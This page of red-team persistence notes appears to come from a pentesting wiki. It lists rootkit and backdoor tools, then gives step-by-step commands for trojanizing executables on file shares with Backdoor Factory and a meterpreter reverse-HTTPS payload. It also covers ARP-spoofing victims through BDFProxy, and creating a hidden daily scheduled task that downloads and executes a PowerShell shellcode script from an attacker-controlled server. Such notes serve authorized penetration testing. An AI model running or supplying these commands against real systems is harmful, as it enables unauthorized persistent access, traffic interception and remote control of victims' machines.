Persistence

Guides and Reference
Tools

  • Egress Buster - EgressBuster is a way to test the effectiveness of egress filtering for an individual area.

  • Egress-Assess - Egress-Assess is a tool used to test egress data detection capabilities

  • Sharpersist - Windows persistence toolkit written in C#.

  • chromebackdoor - Chromebackdoor is a PoC of pentest tool, this tool use a MITB technique for generate a windows executable ".exe" after launch run a malicious extension or script on most popular browsers, and send all DOM data on command and control.

  • cymothoa - Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them.

  • casper-fs - Casper-fs is a custom Linux Kernel Module generator to work with resources to protect or hide a custom list of files. Each LKM has resources to protect or hide files following a custom list in the YAML rule file. Yes, not even the root has permission to see the files or make actions like edit and remove. The files only can be caught, edited, and deleted if the user sends a proper key to the custom device to liberate the action in the file system.

  • OSRipper - AV evading OSX Backdoor and Crypter Framework

  • TripleCross - A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and stealth capabilities.

  • Nidhogg - Nidhogg is an all-in-one simple to use rootkit for red teams.

  • SharpEventPersist -Persistence by writing/reading shellcode from Event Log

  • SharpStay - .NET project for installing Persistence

BackDoorFactory

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the pre-patched state.

  • We can find the most commonly used binaries by searching open shares

    • We start with a command shell on the victim

    • Next we find all the shares on the network the user has access to.

      • >Powershell.exe “IEX (New-Object Net.WebClient).DownloadString('https://raw/githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Invoke-ShareFinder -ExcludeIPC -ExcludePrint -CheckShareAccess | Out-File -Encoding ascii found_shares.txt”

    • Next we take the output from the shares and starts enumerating all the executables and finding the LastAccessTime and LastWriteTime

      • Powershell.exe “IEX (New-Object Net.WebClient).DownloadString('https://raw/githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Invoke-FileFinder -ShareList .\found_shares.txt -FreshEXEs -ExcludeHidden -CheckWriteAccess"

    • Now we grab a copy of the popular binary you choose. For the following example we will choose procmon.exe

      • #cd /opt/the-backdoor-factory

      • ./backdoor.py -f ~/Desktop/Procmon.exe -s meterpreter_reverse_https -H [your kali IP] -P 8080

    • Once you execute backdoor.py, now you need to find a code Cave to hold your shell code.

    • Once you find a cave that works, pres “a” to append your code. After this is complete, BDF will drop the new exe in the folder that was backdoored.

    • Now take that file and put it back on the fileshare.

  • Setup - MITM

    • Run BDFProxy

      • #bdfproxy

    • BDFProxy will create a metasploit resource file.

      • #msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc

    • We alaso need to config our firewall to forward all http traffic through the mitmproxy

      • #sysctl -w net.ipv4.ip_forward=1

      • #iptables -t nat -a PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080

    • Lastly config the victim host to route through our machine using arpspoofing

      • #arpspoof -i eth0 [ip-vitim][ip gateway]

      • #arpspoof -i eth0 [ip gateway][ip-victim]

Linux Techniques

  • Create a functional Bash init script at /etc/init.d/service

  • Next run #sudo update-rc.d service enable

  • This will create a symlink in the runlevel directories 2-5

  • Next add the following respawn command in /etc/inittab

    → id:2345:respawn:/bin/sh /path/to/application/startup

  • Finally start and stop the service

    → #sudo service service stop

    → #sudo service service start

  • PTFM: .Service Persistence - pg. 88

Windows Techniques

  • RTFM: Task Scheduler Persistence - pg. 32

  • PTFM: Task Scheduler - pg. 25

  • We can use Metasploit to configure a schtask to run once a day to connect back to our meterpreter handler

  • First we grab and modify a copy of invoke-shellcode.

    • #cd /opt/PowerSploit/CodeExecution

    • #cp Invoke-Shellcode.ps1 1.ps1

  • Next we edit the script to add our shell info

    • Add the following line when filling in the listener IP and port

    • # invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost [LISTENER IP] -Lport [Listener-port] -Force;

  • Now we have a shortened invoke-shellcode script and can move the file off to a web server

    • #cp 1.ps1/var/www/

    • #service apache2 start

  • Verify by visiting htt[://[your ip]/1.ps1

  • Now we add a command to schtasks that downloads and runs the target script everyday

    • #schtasks /create /tn [Fake (service name] /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -NoLogo -WindowStyle hidden -Noninteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(’ ‘http://[Your IP]/1.ps1’ ‘ ’))' " /SC DAILY /ST 12:00:00

  • Options

    • If you have system privileges you can run this under SYSTEM. Add “/ru System” to the above command

    • If you are attacking a 32 bit system, change the powershell location in schtask to “c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe”

AD Persistence

PreviousC2 FrameworksNextDefense Evasion

Last updated